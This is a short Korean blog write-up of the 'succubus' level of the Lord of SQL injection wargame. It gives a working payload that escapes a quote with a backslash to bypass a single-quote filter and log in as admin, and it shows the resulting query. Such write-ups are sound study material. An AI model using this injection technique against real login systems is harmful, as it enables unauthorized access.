[Lord of SQL injection] succubus

티스토리 뷰

writeup/LOS

hoppi 2021. 7. 16. 12:19

51번째 글.

id, pw 파라미터에 대해서 single quote를 필터링하고 있다.

백슬래시를 쓸 수 있으면 escape를 이용할 수 있다.

?id=\&pw= or id="admin"%23

위처럼 주게 되면

select id from prob_succubus where id='\' and pw=' or id="admin"#'

두번째 single quote가 escape되고

id의 첫 번째 single quote와 pw의 첫 번째 single quote로 감싸 지게 되어서 빨간색 부분이 id의 값으로 들어가게 된다.

[Lord of SQL injection] nightmare (0)	2021.07.19
[Lord of SQL injection] zombie_assassin (0)	2021.07.19
[Lord of SQL injection] assassin (0)	2021.07.15
[Lord of SQL injection] bugbear (0)	2021.07.13
[Lord of SQL injection] darknight (0)	2021.07.12

공지사항

최근에 올라온 글

최근에 달린 댓글

링크

글 보관함